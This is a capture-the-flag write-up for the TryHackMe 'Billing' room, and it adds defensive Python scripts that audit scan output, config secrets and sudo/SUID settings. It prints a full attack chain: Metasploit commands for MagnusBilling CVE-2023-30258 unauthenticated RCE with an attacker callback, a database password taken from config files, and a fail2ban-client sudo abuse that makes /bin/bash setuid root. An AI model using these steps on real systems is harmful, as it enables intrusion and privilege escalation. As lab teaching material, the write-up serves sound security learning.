# Billing

{% embed url="https://tryhackme.com/room/billing" %}

Hey, fellow hackers! 🏴‍☠️

Today, we're setting sail into the **Billing** room on TryHackMe, where our mission is to **navigate through vulnerabilities**, uncover flags and claim **root access!** 💀⚔️

## Reconnaissance - Scouting the Enemy 🚀

Every great conquest starts with **intelligence gathering**. A thorough **network scan** helps identify open services and potential entry points.

I use **Nmap** for this task:

```bash
 r1pp3r 🔱 god2eye ~/Documents/tryhackme/billing 
  λ nmap -sC -sV 10.10.137.233 | tee nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 12:52 IST
Nmap scan report for 10.10.137.233
Host is up (0.35s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_  256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.137.233/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
3306/tcp open  mysql   MariaDB (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds
```

🕵️ **Findings :**

* **22/tcp** - OpenSSH 8.4p1 (Debian)
* **80/tcp** - Apache 2.4.56 hosting a web application (`/mbilling/`)
* **3306/tcp** - MariaDB service, access denied (likely hosting sensitive VoIP data)

The presence of `/mbilling/` suggests the system is running **MagnusBilling**, a widely used VoIP billing platform. This discovery guides our next steps towards **web exploitation**.
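To make the scan results reusable rather than eyeballed, here is an added example (not part of the original writeup) that parses Nmap's normal output into structured records and derives the same findings listed above: the service versions, the web application title, the path hidden by `robots.txt`, and the database listener exposed to the network. The sample text is the port table from the scan above with the host-key lines trimmed; the watchlist of database ports is my own assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the port table from the Nmap run above (hostkey lines trimmed).
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|_  3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling
|_Requested resource was http://10.10.137.233/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry
|_/mbilling/
3306/tcp open  mysql   MariaDB (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "80/tcp   open  http    Apache httpd 2.4.56 ((Debian))" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script lines start with "| " or "|_" (the underscore marks the last line of a script block)
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")

# Ports whose network exposure is a finding on its own (assumed watchlist, not from the page)
DB_PORTS = {3306: "MySQL/MariaDB", 5432: "PostgreSQL", 1433: "MSSQL", 6379: "Redis", 27017: "MongoDB"}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines with the leading '|'/'|_' stripped


def parse_nmap(text):
    """Parse Nmap's normal output into Service records; script lines attach to the preceding port."""
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m[1]), m[2], m[3], m[4], m[5].strip())
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current.scripts.append(m[1].strip())
    return services


def robots_disallowed(service):
    """Return the paths Nmap printed under http-robots.txt (one disallowed entry per line)."""
    paths, in_robots = [], False
    for out in service.scripts:
        if out.startswith("http-robots.txt"):
            in_robots = True
        elif in_robots and out.startswith("/"):
            paths.append(out)
        else:
            in_robots = False
    return paths


def assess(services):
    """Turn parsed services into the findings a reviewer would note from the scan."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        if s.port in DB_PORTS:
            findings.append(f"{s.port}/{s.proto}: {DB_PORTS[s.port]} listener reachable from the network ({s.version})")
        for out in s.scripts:
            if out.startswith("http-title:"):
                findings.append(f"{s.port}/{s.proto}: web app title '{out.split(':', 1)[1].strip()}'")
        for path in robots_disallowed(s):
            findings.append(f"{s.port}/{s.proto}: robots.txt hides {path}, a hint at the application root")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap(NMAP_OUTPUT)):
        print(finding)
```

Feeding it the full `nmap.txt` saved with `tee` works the same way; the parser keys on the `PORT/PROTO` table rows and ignores the banner and summary lines.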

## Initial Access - Breaking In! 🏴‍☠

<figure><img src="https://2619072038-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyCrT4YxGad5HFRKWhUG8%2Fuploads%2FuBrFrIivOaeM7LWAcl17%2Fwebsite_login.png?alt=media&#x26;token=1fc5f6a9-3c1d-44be-8b76-97b18a6b874e" alt=""><figcaption><p><strong>MagnusBilling Login</strong></p></figcaption></figure>

#### Exploiting MagnusBilling (CVE-2023-30258)

A quick **OSINT search** reveals that `MagnusBilling` has an **Unauthenticated Remote Command Execution (RCE) vulnerability** [(CVE-2023-30258)](https://www.rapid7.com/db/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258/). Leveraging this flaw provides us with an entry point into the system.

Time to **fire up Metasploit** 🔥

```
msfconsole
search magnusbilling
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS <machine_ip>
set LHOST <attacker_ip>
set LPORT 6969
exploit
```

🎯 Boom! We're in!

* Successfully executed RCE 🎉, gaining a **meterpreter shell** 💻

Let’s stabilize our foothold and get comfy:

```
meterpreter > shell

which python3
/usr/bin/python3

python3 -c "import pty;pty.spawn('/bin/bash')"
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home/magnus
asterisk@Billing:/home/magnus$ cat user.txt 
cat user.txt
[REDACTED]
```

With a foothold on the box (the shell runs as the **asterisk** service user, and magnus's home directory is readable), we grab the user flag and begin **system enumeration** and credential discovery.

User flag retrieved! Yo-ho-ho, let’s press on. 🏴‍☠️

## Privilege Escalation - Climbing the Ladder 🏆

**Hunting for Credentials and Misconfigurations**

A deep dive into configuration files often yields useful information. Looking into key application settings, we find potential credentials:

```
cd /var/www/html/mbilling/protected/config
cat main.php
```

Additionally, another configuration file linked to Asterisk contains database credentials:

```
cat /etc/asterisk/res_config_mysql.conf
```

Extracted credentials—💰 Jackpot!

```
dbuser = mbillingUser
dbpass = BLOGYwvtJkI7uaX5
```
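The defensive lesson here is that a web-application config file readable by the service account hands its database password to anyone who lands a shell as that account. As an added example (not from the original writeup), here is a small audit that scans configuration files for credential-looking keys, in both ini style (as in `res_config_mysql.conf`) and PHP array style, and reports how widely each file is readable, without copying the secret itself into the report. The key-name pattern and the two constructed sample files (with placeholder secrets, not the box's real ones) are my assumptions.

```python
import os
import re
import stat
import tempfile

# Key names that usually carry a secret (assumed list; extend for your environment)
SECRET_KEY_RE = re.compile(r"pass(word)?|secret|token|api_?key", re.IGNORECASE)
# ini style "key = value" (e.g. res_config_mysql.conf) and PHP array entries 'key' => 'value'
INI_RE = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*(.+?)\s*$")
PHP_RE = re.compile(r"""['"]([\w.]+)['"]\s*=>\s*['"]([^'"]*)['"]""")


def find_secrets(path):
    """Return (key, value) pairs in `path` whose key name looks like a credential."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            stripped = line.strip()
            if not stripped or stripped[0] in ";#":  # skip blanks and ini/shell-style comments
                continue
            for rx in (INI_RE, PHP_RE):
                for key, value in rx.findall(stripped):
                    if SECRET_KEY_RE.search(key) and value:
                        hits.append((key, value))
    return hits


def exposure(path):
    """Describe who can read the file: a world-readable config hands its secrets to every local account."""
    mode = os.stat(path).st_mode
    if mode & stat.S_IROTH:
        return "world-readable"
    if mode & stat.S_IRGRP:
        return "group-readable"
    return "owner-only"


def audit(paths):
    """Report credential-bearing keys per file; only the value length is recorded, never the value."""
    report = []
    for p in paths:
        for key, value in find_secrets(p):
            report.append({"file": p, "key": key, "exposure": exposure(p), "value_len": len(value)})
    return report


def write_samples(directory):
    """Create two constructed config files with placeholder secrets (not the box's real credentials)."""
    conf = os.path.join(directory, "res_config_mysql.conf")
    with open(conf, "w") as fh:
        fh.write("[general]\ndbhost = 127.0.0.1\ndbuser = mbillingUser\ndbpass = placeholder-secret\n; dbport = 3306\n")
    os.chmod(conf, 0o644)  # readable by everyone, the weak setting
    php = os.path.join(directory, "main.php")
    with open(php, "w") as fh:
        fh.write("<?php\nreturn array(\n  'db' => array(\n    'username' => 'mbillingUser',\n"
                 "    'password' => 'another-placeholder',\n  ),\n);\n")
    os.chmod(php, 0o640)  # readable by owner and group only
    return [conf, php]


def run_demo():
    """Build the sample files in a temporary directory and audit them."""
    with tempfile.TemporaryDirectory() as d:
        return audit(write_samples(d))


if __name__ == "__main__":
    for entry in run_demo():
        print(f"{entry['file']}: key '{entry['key']}' ({entry['value_len']} chars) in a {entry['exposure']} file")
```

Pointing `audit()` at real paths such as `/etc/asterisk/res_config_mysql.conf` and the application's `protected/config/main.php` is the intended use; anything it reports as world- or group-readable to the web server account is exactly what an attacker with a web shell can read.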

Sadly, no instant root access. I continued exploring for privilege escalation paths—our journey is **far from over!** 🔥

Checking **sudo privileges**:

```bash
asterisk@Billing:/home$ sudo -l
sudo -l
Matching Defaults entries for asterisk on Billing:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
```

**Observation:**

🎯 **Bingo!** The **asterisk** user can execute `/usr/bin/fail2ban-client` as **root** **without a password**.

This matters because `fail2ban-client` can rewrite, at runtime, the shell command a jail's action runs when it bans an address, and the fail2ban daemon executes that command as root. By modifying **fail2ban’s SSH action**, we introduce a **SUID backdoor**:

```bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client status
Status
|- Number of jail:	8
`- Jail list:	ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
1
```

Verifying changes:

```bash
asterisk@Billing:/home$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
```
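Both halves of this escalation are easy to catch on the defender's side: the `sudo -l` rule that granted a command-running binary without a password, and the setuid bit that appeared on `/bin/bash`. As an added example (not from the original writeup), here is a checker that parses `sudo -l` privilege lines and `ls -l` entries and flags both conditions. The sample lines are constructed from the output above plus a harmless entry for contrast, and the watchlist of risky sudo targets is my own assumption (fail2ban-client is on it for the reason the writeup demonstrates: its `set <jail> action <name> actionban <cmd>` changes a command the daemon later runs as root).

```python
import re

# Constructed sample: the privilege lines from `sudo -l` above plus a narrow, harmless rule.
SUDO_L_OUTPUT = """\
User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
    (root) /usr/bin/systemctl status apache2
"""

# Constructed sample of `ls -l` lines: the setuid bash from above beside a legitimate setuid binary.
LS_OUTPUT = """\
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
-rwsr-xr-x 1 root root   71912 Jan 20  2022 /usr/bin/su
-rwxr-xr-x 1 root root  123456 Jan 20  2022 /usr/bin/fail2ban-client
"""

# Binaries that let the caller run arbitrary commands once reachable through sudo (assumed watchlist)
RISKY_SUDO_TARGETS = {"/usr/bin/fail2ban-client", "/usr/bin/vim", "/usr/bin/python3", "/bin/bash"}
# Shells that should never carry a setuid-root bit
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash", "/usr/bin/zsh"}

# "(ALL) NOPASSWD: /usr/bin/fail2ban-client" -> runas, tag list, command
PRIV_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.*)$")
# "-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash" -> mode, owner, group, path
LS_RE = re.compile(r"^(?P<mode>[-a-z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$")


def parse_sudo_l(text):
    """Extract the privilege lines of `sudo -l` output into rule dicts."""
    rules = []
    for line in text.splitlines():
        m = PRIV_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        cmd = m["cmd"].strip()
        rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in tags, "binary": cmd.split()[0], "cmd": cmd})
    return rules


def sudo_findings(rules):
    """Flag rules whose target binary can be turned into arbitrary root command execution."""
    out = []
    for r in rules:
        if r["binary"] in RISKY_SUDO_TARGETS:
            how = " without a password" if r["nopasswd"] else ""
            out.append(f"sudo rule grants {r['binary']} as ({r['runas']}){how}; treat it as a root shell")
    return out


def parse_ls(text):
    """Parse `ls -l` lines; the setuid/setgid bits sit at positions 3 and 6 of the mode string."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:
            mode = m["mode"]
            entries.append({"path": m["path"], "owner": m["owner"],
                            "setuid": mode[3] in "sS", "setgid": mode[6] in "sS"})
    return entries


def suid_findings(entries):
    """Flag setuid-root shells, the artifact this escalation leaves behind."""
    return [f"{e['path']} is setuid root: any local user can start it with -p and keep root privileges"
            for e in entries if e["setuid"] and e["owner"] == "root" and e["path"] in SHELLS]


if __name__ == "__main__":
    for f in sudo_findings(parse_sudo_l(SUDO_L_OUTPUT)) + suid_findings(parse_ls(LS_OUTPUT)):
        print(f)
```

On a live host, `find / -perm -4000 -type f -exec ls -l {} +` produces lines `parse_ls()` accepts, so the same check can run as a periodic baseline comparison; the sudo side is better fixed at the source by not granting `fail2ban-client` through sudo at all, or by limiting the rule to specific read-only subcommands.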

Executing `/bin/bash -p` now elevates us to **root.** 🚀 **Now, let’s take the throne!**

```bash
asterisk@Billing:/home$ /bin/bash -p
/bin/bash -p
bash-5.1# whoami
whoami
root
bash-5.1# cat /root/root.txt
cat /root/root.txt
[REDACTED]
```

## Conclusion 🏁

This exercise highlights a **real-world attack chain**: an exposed, vulnerable web application, cleartext database credentials in configuration files, and an over-broad sudo rule that turned a service account into root.

**Final words?** Stay sharp, keep hacking, and always test your defenses! ⚔️🔥

Happy hacking, fellow pirates! 🏴‍☠️💻
